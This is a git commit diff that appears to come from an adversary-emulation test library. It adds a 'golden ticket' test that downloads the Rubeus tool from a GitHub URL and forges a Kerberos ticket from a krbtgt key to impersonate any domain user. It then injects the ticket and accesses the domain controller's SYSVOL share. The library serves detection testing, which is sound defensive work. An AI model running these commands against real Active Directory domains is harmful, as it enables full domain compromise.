Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-11-16 16:04:07 +00:00
parent 274fa5584b
commit 6146dbfa24
6 changed files with 199 additions and 2 deletions
@@ -29,6 +29,7 @@ credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
@@ -17,6 +17,7 @@ credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c8
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
@@ -51,6 +51,7 @@
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
  - Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+  - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
 - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -35,6 +35,7 @@
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
  - Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
+  - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
 - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -2156,7 +2156,8 @@ credential-access:
          type: String
          default: goldenticketfakeuser
        krbtgt_aes256_key:
-          description: Krbtgt AES256 key
+          description: Krbtgt AES256 key (you will need to set to match your krbtgt
+            key for your domain)
          type: String
          default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
        mimikatz_path:
@@ -2208,6 +2209,90 @@ credential-access:
          loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content
          $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat
          -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n"
+    - name: Crafting Active Directory golden tickets with Rubeus
+      auto_generated_guid: e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+      description: |
+        Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+        This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+        The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+      supported_platforms:
+      - windows
+      input_arguments:
+        domaincontroller:
+          description: Targeted Active Directory domain FQDN
+          type: String
+          default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"
+        account:
+          description: Account to impersonate
+          type: String
+          default: "$ENV:username"
+        krbtgt_aes256_key:
+          description: Krbtgt AES256 key (you will need to set to match your krbtgt
+            key for your domain)
+          type: String
+          default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
+        local_folder:
+          description: Local path of Rubeus executable
+          type: Path
+          default: "$Env:temp"
+        local_executable:
+          description: name of the rubeus executable
+          type: String
+          default: rubeus.exe
+        rubeus_url:
+          description: URL of Rubeus executable
+          type: Url
+          default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
+      - description: 'Rubeus must exist
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+          $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\"
+          golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller})
+          /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")}
+          | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n#
+          create batch file with commands to run in a separate \"runas /netonly\"
+          session\n# so we don't purge Kerberos ticket from the current Windows session\n#
+          its output goes to golden.txt temp file, because we cannot capture \"runas
+          /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n  echo Purge
+          existing tickets and create golden ticket:\n  klist purge\n  cd %temp%\n
+          \ \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n  echo.\n
+          \ echo Requesting SYSVOL:\n  dir \\\\$(#{domaincontroller})\\SYSVOL\n  \n
+          \ echo.\n  echo Tickets after requesting SYSVOL:\n  klist\n\n  echo.\n  echo
+          End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename |
+          Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new
+          empty session (password and username do not matter)\necho \"foo\" | runas
+          /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until
+          the output file has logged the entire attack\ndo {\n  Start-Sleep 1 # wait
+          a bit so the output file has time to be created\n  Get-Content -Path \"$env:TEMP\\golden.txt\"
+          -Wait | ForEach-Object {\n    if ($_ -match 'End of Golden Ticket attack')
+          { break } \n  }\n} while ($false) # dummy loop so that 'break' can be used\n\n#
+          show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n#
+          cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item
+          $env:TEMP\\golden.txt -ErrorAction Ignore\n"
  T1552.006:
    technique:
      external_references:
@@ -10,6 +10,8 @@ The KDC service runs all on domain controllers that are part of an Active Direct

 - [Atomic Test #1 - Crafting Active Directory golden tickets with mimikatz](#atomic-test-1---crafting-active-directory-golden-tickets-with-mimikatz)

+- [Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus](#atomic-test-2---crafting-active-directory-golden-tickets-with-rubeus)
+

 <br/>

@@ -33,7 +35,7 @@ The generated ticket is injected in a new empty Windows session and discarded af
 | domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | String | S-1-5-21-DEFAULT|
 | domain | Targeted Active Directory domain FQDN | String | %userdnsdomain%|
 | account | Account to impersonate | String | goldenticketfakeuser|
-| krbtgt_aes256_key | Krbtgt AES256 key | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
 | mimikatz_path | Mimikatz windows executable | Path | $env:TEMP&#92;mimikatz&#92;x64&#92;mimikatz.exe|


@@ -117,4 +119,110 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force



+<br/>
+<br/>
+
+## Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus
+Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
+This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
+The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e42d33cd-205c-4acf-ab59-a9f38f6bad9c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domaincontroller | Targeted Active Directory domain FQDN | String | $ENV:logonserver.TrimStart('&#92;') + "." + "$ENV:userdnsdomain"|
+| account | Account to impersonate | String | $ENV:username|
+| krbtgt_aes256_key | Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) | String | b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| rubeus_url | URL of Rubeus executable | Url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+
+cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden
+$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name
+
+# create batch file with commands to run in a separate "runas /netonly" session
+# so we don't purge Kerberos ticket from the current Windows session
+# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
+@"
+>%TEMP%\golden.txt 2>&1 (
+  echo Purge existing tickets and create golden ticket:
+  klist purge
+  cd %temp%
+  "#{local_folder}\#{local_executable}" ptt /ticket:kirbifile
+
+  echo.
+  echo Requesting SYSVOL:
+  dir \\$(#{domaincontroller})\SYSVOL
+  
+  echo.
+  echo Tickets after requesting SYSVOL:
+  klist
+
+  echo.
+  echo End of Golden Ticket attack
+)
+"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
+
+# run batch file in a new empty session (password and username do not matter)
+echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
+
+# wait until the output file has logged the entire attack
+do {
+  Start-Sleep 1 # wait a bit so the output file has time to be created
+  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
+    if ($_ -match 'End of Golden Ticket attack') { break } 
+  }
+} while ($false) # dummy loop so that 'break' can be used
+
+# show output from new empty session
+Get-Content $env:TEMP\golden.txt
+
+# cleanup temp files
+Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
+Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+
 <br/>